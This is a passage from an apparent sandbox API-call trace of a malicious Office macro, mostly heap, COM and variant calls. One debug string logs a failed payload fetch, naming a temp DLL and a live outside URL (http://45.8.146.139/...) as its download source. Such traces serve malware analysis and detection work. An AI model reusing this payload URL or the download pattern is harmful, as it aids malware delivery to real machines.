() returned 1 [0148.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb7eb08, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 51 [0148.550] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x66) returned 0xcb5ba10 [0148.550] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb7eb08, cbMultiByte=-1, lpWideCharStr=0xcb5ba10, cchWideChar=51 | out: lpWideCharStr="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp.dll") returned 51 [0148.550] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\ydb10.tmp.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x196ea4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.551] GetLastError () returned 0x2 [0148.551] GetLastError () returned 0x2 [0148.551] SetLastError (dwErrCode=0x2) [0148.551] GetLastError () returned 0x2 [0148.551] SetLastError (dwErrCode=0x2) [0148.551] GetLastError () returned 0x2 [0148.551] SetLastError (dwErrCode=0x2) [0148.551] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb5ba10 | out: hHeap=0x5c0000) returned 1 [0148.551] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb7eb08 | out: hHeap=0x5c0000) returned 1 [0148.551] LocalAlloc (uFlags=0x40, uBytes=0x1000) returned 0xf578c88 [0148.552] GetLocalTime (in: lpSystemTime=0x1975b8 | out: lpSystemTime=0x1975b8*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x22, wSecond=0x28, wMilliseconds=0x1dd)) [0148.552] wsprintfA (in: param_1=0xf578c88, param_2="%02u:%02u:%02u " | out: param_1="19:34:42 ") returned 9 [0148.552] wsprintfA (in: param_1=0xf578c91, param_2="File %s not found, check url %s, if it's valid\n" | out: param_1="File C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp.dll not found, check url http://45.8.146.139/fhfty/BGYGN01M2AWVEJJYWONII6ZCFIQSR1QN/-f, if it's valid\n") returned 154 [0148.552] OutputDebugStringA (lpOutputString="19:34:42 File C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\yDB10.tmp.dll not found, check url http://45.8.146.139/fhfty/BGYGN01M2AWVEJJYWONII6ZCFIQSR1QN/-f, if it's valid\n") [0148.552] LocalFree (hMem=0xf578c88) returned 0x0 [0148.552] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf51cc60 | out: hHeap=0x5c0000) returned 1 [0148.553] GetModuleHandleW (lpModuleName=0x0) returned 0x900000 [0148.553] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81460 | out: hHeap=0x5c0000) returned 1 [0148.553] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb812b0 | out: hHeap=0x5c0000) returned 1 [0148.553] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81a48 | out: hHeap=0x5c0000) returned 1 [0148.554] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb30028 | out: hHeap=0x5c0000) returned 1 [0148.554] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc8ce190 | out: hHeap=0x5c0000) returned 1 [0148.554] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927cd0 | out: hHeap=0x5c0000) returned 1 [0148.554] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb82028 | out: hHeap=0x5c0000) returned 1 [0148.554] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81ed8 | out: hHeap=0x5c0000) returned 1 [0148.554] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81fc8 | out: hHeap=0x5c0000) returned 1 [0148.554] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb70458 | out: hHeap=0x5c0000) returned 1 [0148.554] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81ec8 | out: hHeap=0x5c0000) returned 1 [0148.555] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcbe2b70 | out: hHeap=0x5c0000) returned 1 [0148.555] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc876c58 | out: hHeap=0x5c0000) returned 1 [0148.555] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xb2886b8 | out: hHeap=0x5c0000) returned 1 [0148.555] RtlInterlockedFlushSList (in: ListHead=0x11f7a0e8 | out: ListHead=0x11f7a0e8) returned 0x0 [0148.556] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x769d5f30 [0148.556] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81fd8 | out: hHeap=0x5c0000) returned 1 [0148.557] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xb2a0fd8 | out: hHeap=0x5c0000) returned 1 [0148.557] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcbdbfb8 | out: hHeap=0x5c0000) returned 1 [0148.557] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x769d5f30 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb705c0 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf36e7b0 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb38950 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb81220 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb38990 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927f10 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc87ae18 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb39050 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc87a938 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb2cf78 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb70200 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb39350 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927d10 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927e70 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb2cf60 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc99d718 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb814f0 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb70110 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb70138 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb1ec98 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927e30 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc928070 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb701b0 | out: hHeap=0x5c0000) returned 1 [0148.558] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc87a968 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf36e858 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb70390 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcbeb170 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927df0 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927ed0 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb2ced0 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927d50 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf36eaf8 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf36ed28 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927fb0 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc87a998 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927ef0 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc87ab48 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc927f70 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb5c6c0 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xf51c620 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xc945238 | out: hHeap=0x5c0000) returned 1 [0148.559] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcb307b8 | out: hHeap=0x5c0000) returned 1 [0148.561] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0xcbe4638 | out: hHeap=0x5c0000) returned 1 [0148.561] FreeLibrary (hLibModule=0x76910000) returned 1 [0148.561] FreeLibrary (hLibModule=0x76910000) returned 1 [0148.561] FreeLibrary (hLibModule=0x76910000) returned 1 [0148.561] FreeLibrary (hLibModule=0x76910000) returned 1 [0148.561] FreeLibrary (hLibModule=0x76910000) returned 1 [0148.561] FreeLibrary (hLibModule=0x76720000) returned 1 [0148.954] Sleep (dwMilliseconds=0x0) [0149.049] GetAsyncKeyState (vKey=3) returned 0 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.050] VarCmp (pvarLeft=0x197cc4, pvarRight=0x197cb4, lcid=0x0, dwFlags=0x30001) returned 0x1 [0149.050] GetLocalTime (in: lpSystemTime=0x197b4c | out: lpSystemTime=0x197b4c*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x4, wDay=0xb, wHour=0x13, wMinute=0x22, wSecond=0x28, wMilliseconds=0x3d2)) [0149.052] Sleep (dwMilliseconds=0x0) [0149.085] SetErrorMode (uMode=0x8001) returned 0x8001 [0149.085] _stricmp (_Str1="user32", _Str2="VBE6.DLL") returned -1 [0149.085] LoadLibraryA (lpLibFileName="user32") returned 0x743d0000 [0149.095] SetErrorMode (uMode=0x8001) returned 0x8001 [0149.096] GetProcAddress (hModule=0x743d0000, lpProcName="KillTimer") returned 0x74408aa0 [0149.097] KillTimer (hWnd=0x0, uIDEvent=0x7f80) returned 1 [0149.097] GetLastError () returned 0x0 [0149.102] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.102] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.102] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.102] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0149.104] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.104] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.104] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.104] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.104] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0149.104] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xc8766d8) returned 0x0 [0149.105] MkParseDisplayName (in: pbc=0xc8766d8, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xc876a18) returned 0x0 [0149.108] IUnknown:Release (This=0xc8766d8) returned 0x0 [0149.108] BindMoniker (in: pmk=0xc876a18, grfOpt=0x0, iidResult=0x695f8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8cec39c) returned 0x0 [0149.108] IUnknown:Release (This=0xc876a18) returned 0x0 [0149.111] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0149.111] SafeArrayAllocData (psa=0xc87a948) returned 0x0 [0149.122] SafeArrayDestroyData (psa=0xc87a948) returned 0x0 [0149.122] SafeArrayDestroyDescriptor (psa=0xc87a948) returned 0x0 [0149.129] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.129] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.129] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.129] VarCmp (pvarLeft=0x197d44, pvarRight=0x197d34, lcid=0x0, dwFlags=0x30001) returned 0x1 [0149.131] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.131] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.131] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.131] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x2 [0149.131] VarCmp (pvarLeft=0x19799c, pvarRight=0x19798c, lcid=0x0, dwFlags=0x30001) returned 0x1 [0149.131] CreateBindCtx (in: reserved=0x0, ppbc=0x197808 | out: ppbc=0x197808*=0xc876c58) returned 0x0 [0149.131] MkParseDisplayName (in: pbc=0xc876c58, szUserName="new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B", pchEaten=0x19780c, ppmk=0x197810 | out: pchEaten=0x19780c, ppmk=0x197810*=0xc8766d8) returned 0x0 [0149.132] IUnknown:Release (This=0xc876c58) returned 0x0 [0149.132] BindMoniker (in: pmk=0xc8766d8, grfOpt=0x0, iidResult=0x695f8088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x197804 | out: ppvResult=0x197804*=0x8cec5ac) returned 0x0 [0149.135] IUnknown:Release (This=0xc8766d8) returned 0x0 [0149.138] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x197bac | out: ppsaOut=0x197bac) returned 0x0 [0149.138] SafeArrayAllocData (psa=0xc87a978) returned 0x0 [0149.141] SafeArrayDestroyData (psa=0xc87a978) returned 0x0 [0149.141] SafeArrayDestroyDescriptor (psa=0xc87a978) returned 0x0 [0149.147] SafeArrayDestroyData (psa=0xc8778e8) returned 0x0 [0149.157] SafeArrayAllocData (psa=0xc8778e8) returned 0x0 [0149.157] SafeArrayDestroyData (psa=0xc8778e8) returned 0x0 [0149.157] SafeArrayDestroyDescriptor (psa=0xc8778e8) returned 0x0 Thread: id = 16 os_tid = 0x13c4 Thread: id = 17 os_tid = 0x13c8 Thread: id = 18 os_tid = 0xdbc